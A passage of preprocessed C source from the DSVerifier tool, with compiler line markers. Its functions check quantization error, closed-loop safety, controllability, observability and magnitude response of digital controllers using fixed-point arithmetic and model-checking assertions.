__quant_error; } double fxp_ss_closed_loop_quantization_error(double reference){ double reference_aux[4][4]; double result1[4][4]; double temp_result1[4][4]; double result2[4][4]; double temp_states[4][4]; fxp_t K_fxp[4][4]; fxp_t states_fxp[4][4]; fxp_t result_fxp[4][4]; unsigned int i; unsigned int j; unsigned int k; short unsigned int flag = 0; for(i=0; i<nOutputs;i++){ for(j=0; j<nInputs;j++){ if(_controller_fxp.D[i][j] != 0){ flag = 1; } } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ reference_aux[i][j]=0; K_fxp[i][j] = 0; } } for(i=0; i<nInputs;i++){ reference_aux[i][0]= reference; } for(i=0; i<4;i++){ states_fxp[i][0]=0; } for(i=0; i<nStates;i++){ K_fxp[0][i]= fxp_double_to_fxp(_controller_fxp.K[0][i]); } for(i=0; i<4;i++){ for(j=0; j<4;j++){ result1[i][j]=0; result2[i][j]=0; } } for(k=0; k<nStates;k++) { states_fxp[k][0]= fxp_double_to_fxp(_controller_fxp.states[k][0]); } fxp_matrix_multiplication(nOutputs,nStates,nStates,1,K_fxp,states_fxp,result_fxp); fxp_t reference_fxp[4][4]; fxp_t result_fxp2[4][4]; for(k=0;k<nInputs;k++) { reference_fxp[k][0] =fxp_double_to_fxp(fxp_quantize(reference_aux[k][0])); } fxp_sub_matrix(nInputs,1, reference_fxp, result_fxp, result_fxp2); for(k=0; k<nInputs;k++) { _controller_fxp.inputs[k][0] = fxp_to_double(fxp_quantize(result_fxp2[k][0])); } double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_fxp.C,_controller_fxp.states,result1); if(flag == 1) { double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_fxp.D,_controller_fxp.inputs,result2); } double_add_matrix(nOutputs,1,result1,result2,_controller_fxp.outputs); double_matrix_multiplication(nStates,nStates,nStates,1,_controller_fxp.A,_controller_fxp.states,result1); double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_fxp.B,_controller_fxp.inputs,result2); double_add_matrix(nStates,1,result1,result2,_controller_fxp.states); return _controller_fxp.outputs[0][0]; } double ss_closed_loop_quantization_error(double reference){ double reference_aux[4][4]; double result1[4][4]; double result2[4][4]; unsigned int i; unsigned int j; short unsigned int flag = 0; for(i=0; i<nOutputs;i++){ for(j=0; j<nInputs;j++){ if(_controller_double.D[i][j] != 0){ flag = 1; } } } for(i=0; i<nInputs;i++){ for(j=0; j<1;j++){ reference_aux[i][j]= reference; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ result1[i][j]=0; result2[i][j]=0; } } double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.K,_controller_double.states,result1); double_sub_matrix(nInputs,1,reference_aux,result1, _controller_double.inputs); double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.C,_controller_double.states,result1); if(flag == 1) double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_double.D,_controller_double.inputs,result2); double_add_matrix(nOutputs,1,result1,result2,_controller_double.outputs); double_matrix_multiplication(nStates,nStates,nStates,1,_controller_double.A,_controller_double.states,result1); double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_double.B,_controller_double.inputs,result2); double_add_matrix(nStates,1,result1,result2,_controller_double.states); return _controller_double.outputs[0][0]; } int verify_error_state_space(void){ int i,j; for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ new_state[i][j]= (_controller.states[i][j]); } } for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ new_stateFWL[i][j]= (_controller.states[i][j]); } } _controller_fxp = _controller; _controller_double = _controller; overflow_mode = 0; fxp_t x[0]; fxp_t min_fxp = fxp_double_to_fxp(impl.min); fxp_t max_fxp = fxp_double_to_fxp(impl.max); double nondet_constant_input = nondet_double(); __DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp); for (i = 0; i < 0; ++i) { x[i] = nondet_constant_input; } double __quant_error; if(closed_loop){ for (i = 0; i < 0; ++i) { __quant_error = ss_closed_loop_quantization_error(x[i]) - fxp_ss_closed_loop_quantization_error(x[i]); # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 ((void) sizeof (( # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" __quant_error < error_limit && __quant_error > ((-1)*error_limit) # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" __quant_error < error_limit && __quant_error > ((-1)*error_limit) # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 ) ; else __assert_fail ( # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" "__quant_error < error_limit && __quant_error > ((-1)*error_limit)" # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 354, __extension__ __PRETTY_FUNCTION__); })) # 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" ; } } else { for (i=0; i < 0; i++) { __quant_error = ss_system_quantization_error(x[i]); # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 ((void) sizeof (( # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" __quant_error < error_limit && __quant_error > ((-1)*error_limit) # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" __quant_error < error_limit && __quant_error > ((-1)*error_limit) # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 ) ; else __assert_fail ( # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" "__quant_error < error_limit && __quant_error > ((-1)*error_limit)" # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 361, __extension__ __PRETTY_FUNCTION__); })) # 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" ; } } return 0; } # 44 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 1 # 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" extern digital_system_state_space _controller; extern double error_limit; extern int closed_loop; double fxp_ss_closed_loop_safety(){ double reference[4][4]; double result1[4][4]; double result2[4][4]; fxp_t K_fpx[4][4]; fxp_t outputs_fpx[4][4]; fxp_t result_fxp[4][4]; unsigned int i; unsigned int j; unsigned int k; short unsigned int flag = 0; for(i=0; i<nOutputs;i++){ for(j=0; j<nInputs;j++){ if(_controller.D[i][j] != 0){ flag = 1; } } } for(i=0; i<nInputs;i++){ for(j=0; j<1;j++){ reference[i][j]= (_controller.inputs[i][j]); } } for(i=0; i<nInputs;i++){ for(j=0; j<nOutputs;j++){ K_fpx[i][j]=0; } } for(i=0; i<nOutputs;i++){ for(j=0; j<1;j++){ outputs_fpx[i][j]=0; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ result_fxp[i][j]=0; } } for(i=0; i<nInputs;i++){ for(j=0; j<nOutputs;j++){ K_fpx[i][j]= fxp_double_to_fxp(_controller.K[i][j]); } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ result1[i][j]=0; result2[i][j]=0; } } for (i = 1; i < 0; i++) { double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1); if(flag == 1){ double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2); } double_add_matrix(nOutputs, 1, result1, result2, _controller.outputs); for(k=0; k<nOutputs;k++){ for(j=0; j<1;j++){ outputs_fpx[k][j]= fxp_double_to_fxp(_controller.outputs[k][j]); } } fxp_matrix_multiplication(nInputs,nOutputs,nOutputs,1,K_fpx,outputs_fpx,result_fxp); for(k=0; k<nInputs;k++){ for(j=0; j<1;j++){ result1[k][j]= fxp_to_double(result_fxp[k][j]); } } printf("### fxp: U (before) = %.9f", _controller.inputs[0][0]); printf("### fxp: reference = %.9f", reference[0][0]); printf("### fxp: result1 = %.9f", result1[0][0]); printf("### fxp: reference - result1 = %.9f", (reference[0][0] - result1[0][0])); double_sub_matrix(nInputs, 1, reference, result1, _controller.inputs); printf("### fxp: Y = %.9f", _controller.outputs[0][0]); printf("### fxp: U (after) = %.9f \n### \n### ", _controller.inputs[0][0]); double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1); double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2); double_add_matrix(nStates, 1, result1, result2, _controller.states); } return _controller.outputs[0][0]; } int verify_safety_state_space(void){ fxp_t output_fxp = fxp_ss_closed_loop_safety(); double output_double = fxp_to_double(output_fxp); # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4 ((void) sizeof (( # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" output_double <= error_limit # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" output_double <= error_limit # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4 ) ; else __assert_fail ( # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" "output_double <= error_limit" # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h", 140, __extension__ __PRETTY_FUNCTION__); })) # 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" ; return 0; } # 45 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 1 # 14 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" extern digital_system_state_space _controller; int verify_controllability(void){ int i; int j; fxp_t A_fpx[4][4]; fxp_t B_fpx[4][4]; fxp_t controllabilityMatrix[4][4]; fxp_t backup[4][4]; fxp_t backupSecond[4][4]; double controllabilityMatrix_double[4][4]; for(i=0; i<nStates;i++){ for(j=0; j<(nStates*nInputs);j++){ A_fpx[i][j] = 0.0; B_fpx[i][j] = 0.0; controllabilityMatrix[i][j] = 0.0; backup[i][j] = 0.0; backupSecond[i][j] = 0.0; controllabilityMatrix_double[i][j] = 0.0; } } for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]); } } for(i=0; i<nStates;i++){ for(j=0; j<nInputs;j++){ B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]); } } if(nInputs > 1){ int l = 0; for(j=0; j<(nStates*nInputs);){ fxp_exp_matrix(nStates,nStates,A_fpx,l,backup); l++; fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond); for(int k = 0; k < nInputs; k++){ for(i = 0; i<nStates;i++){ controllabilityMatrix[i][j]= backupSecond[i][k]; } j++; } } for(i=0; i<nStates;i++){ for(j=0; j<(nStates*nInputs);j++){ backup[i][j]= 0.0; } } fxp_transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs)); fxp_t mimo_controllabilityMatrix_fxp[4][4]; fxp_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_fxp); for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ controllabilityMatrix_double[i][j]= fxp_to_double(mimo_controllabilityMatrix_fxp[i][j]); } } # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ((void) sizeof (( # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(controllabilityMatrix_double,nStates) != 0 # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(controllabilityMatrix_double,nStates) != 0 # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ; else __assert_fail ( # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" "determinant(controllabilityMatrix_double,nStates) != 0" # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 91, __extension__ __PRETTY_FUNCTION__); })) # 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" ; } else { for(j=0; j<nStates;j++){ fxp_exp_matrix(nStates,nStates,A_fpx,j,backup); fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond); for(i = 0; i<nStates;i++){ controllabilityMatrix[i][j]= backupSecond[i][0]; } } for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ controllabilityMatrix_double[i][j]= fxp_to_double(controllabilityMatrix[i][j]); } } # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ((void) sizeof (( # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(controllabilityMatrix_double,nStates) != 0 # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(controllabilityMatrix_double,nStates) != 0 # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ; else __assert_fail ( # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" "determinant(controllabilityMatrix_double,nStates) != 0" # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 113, __extension__ __PRETTY_FUNCTION__); })) # 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" ; } return 0; } int verify_controllability_double(void){ int i; int j; double controllabilityMatrix[4][4]; double backup[4][4]; double backupSecond[4][4]; double controllabilityMatrix_double[4][4]; if(nInputs > 1){ int l = 0; for(j=0; j<(nStates*nInputs);){ double_exp_matrix(nStates,nStates,_controller.A,l,backup); l++; double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond); for(int k = 0; k < nInputs; k++){ for(i = 0; i<nStates;i++){ controllabilityMatrix[i][j]= backupSecond[i][k]; } j++; } } for(i=0; i<nStates;i++){ for(j=0; j<(nStates*nInputs);j++){ backup[i][j]= 0.0; } } transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs)); double mimo_controllabilityMatrix_double[4][4]; double_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_double); # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ((void) sizeof (( # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(mimo_controllabilityMatrix_double,nStates) != 0 # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(mimo_controllabilityMatrix_double,nStates) != 0 # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ; else __assert_fail ( # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" "determinant(mimo_controllabilityMatrix_double,nStates) != 0" # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 154, __extension__ __PRETTY_FUNCTION__); })) # 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" ; } else { for(j=0; j<nStates;j++){ double_exp_matrix(nStates,nStates,_controller.A,j,backup); double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond); for(i = 0; i<nStates;i++){ controllabilityMatrix[i][j]= backupSecond[i][0]; } } # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ((void) sizeof (( # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(controllabilityMatrix,nStates) != 0 # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" determinant(controllabilityMatrix,nStates) != 0 # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 ) ; else __assert_fail ( # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" "determinant(controllabilityMatrix,nStates) != 0" # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 163, __extension__ __PRETTY_FUNCTION__); })) # 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" ; } return 0; } # 46 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 1 # 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" extern digital_system_state_space _controller; int verify_observability(void){ int i; int j; fxp_t A_fpx[4][4]; fxp_t C_fpx[4][4]; fxp_t observabilityMatrix[4][4]; fxp_t backup[4][4]; fxp_t backupSecond[4][4]; double observabilityMatrix_double[4][4]; for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ observabilityMatrix[i][j]= 0; A_fpx[i][j]=0; C_fpx[i][j]= 0; backup[i][j]= 0; backupSecond[i][j]= 0; } } for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<nStates;j++){ C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]); } } if(nOutputs > 1){ int l; j = 0; for(l=0; l<nStates;){ fxp_exp_matrix(nStates,nStates,A_fpx,l,backup); l++; fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond); for(int k = 0; k < nOutputs; k++){ for(i = 0; i<nStates;i++){ observabilityMatrix[j][i]= backupSecond[k][i]; } j++; } } # 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" for(i=0; i<nStates;i++){ for(j=0; j<(nStates*nOutputs);j++){ backup[i][j]= 0.0; } } fxp_transpose(observabilityMatrix,backup,(nStates*nOutputs),nStates); # 99 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" fxp_t mimo_observabilityMatrix_fxp[4][4]; fxp_matrix_multiplication(nStates,(nStates*nOutputs),(nStates*nOutputs),nStates,backup,observabilityMatrix,mimo_observabilityMatrix_fxp); # 112 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ observabilityMatrix_double[i][j]= fxp_to_double(mimo_observabilityMatrix_fxp[i][j]); } } # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 ((void) sizeof (( # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" determinant(observabilityMatrix_double,nStates) != 0 # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" determinant(observabilityMatrix_double,nStates) != 0 # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 ) ; else __assert_fail ( # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" "determinant(observabilityMatrix_double,nStates) != 0" # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 119, __extension__ __PRETTY_FUNCTION__); })) # 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" ; }else{ for(i=0; i<nStates;i++){ fxp_exp_matrix(nStates,nStates,A_fpx,i,backup); fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond); for(j = 0; j<nStates;j++){ observabilityMatrix[i][j]= backupSecond[0][j]; } } for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ observabilityMatrix_double[i][j]= fxp_to_double(observabilityMatrix[i][j]); } } # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 ((void) sizeof (( # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" determinant(observabilityMatrix_double,nStates) != 0 # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" determinant(observabilityMatrix_double,nStates) != 0 # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 ) ; else __assert_fail ( # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" "determinant(observabilityMatrix_double,nStates) != 0" # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 134, __extension__ __PRETTY_FUNCTION__); })) # 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" ; } return 0; } # 47 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h" 1 # 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h" extern filter_parameters filter; extern implementation impl; extern digital_system ds; # 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h" void resp_mag(double* num, int lnum, double* den, int lden, double* res, int N) { double w; int m, i; double out_numRe[N + 1]; double out_numIm[N + 1]; double out_denRe[N + 1]; double out_denIm[N + 1]; double old_out_Re; double zero_test; for (w = 0, i = 0; w <= 3.14159265358979323846; w += 3.14159265358979323846 / N, ++i) { out_numRe[i] = num[0]; out_numIm[i] = 0; for (m = 1; m < lnum; ++m) { old_out_Re = out_numRe[i]; out_numRe[i] = cosTyl(w, 6) * out_numRe[i] - sinTyl(w, 6) * out_numIm[i] + num[m]; out_numIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_numIm[i]; } out_denRe[i] = den[0]; out_denIm[i] = 0; for (m = 1; m < lden; ++m) { old_out_Re = out_denRe[i]; out_denRe[i] = cosTyl(w, 6) * out_denRe[i] - sinTyl(w, 6) * out_denIm[i] + den[m]; out_denIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_denIm[i]; } res[i] = sqrt3(out_numRe[i] * out_numRe[i] + out_numIm[i] * out_numIm[i]); zero_test = sqrt3(out_denRe[i] * out_denRe[i] + out_denIm[i] * out_denIm[i]); __DSVERIFIER_assume(zero_test != 0); res[i] = res[i] / zero_test; } } int verify_magnitude(void) { int freq_response_samples = 100; double w; double w_incr = 1.0 / freq_response_samples; double res[freq_response_samples+1]; int i,j; fxp_t a_fxp[ds.a_size]; fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size); double _a[ds.a_size]; fxp_to_double_array(_a, a_fxp, ds.a_size); fxp_t b_fxp[ds.b_size]; fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size); double _b[ds.b_size]; fxp_to_double_array(_b, b_fxp, ds.b_size); resp_mag(ds.b, ds.b_size, ds.a, ds.a_size, res, freq_response_samples); if (filter.type == 1) { for (i = 0, w = 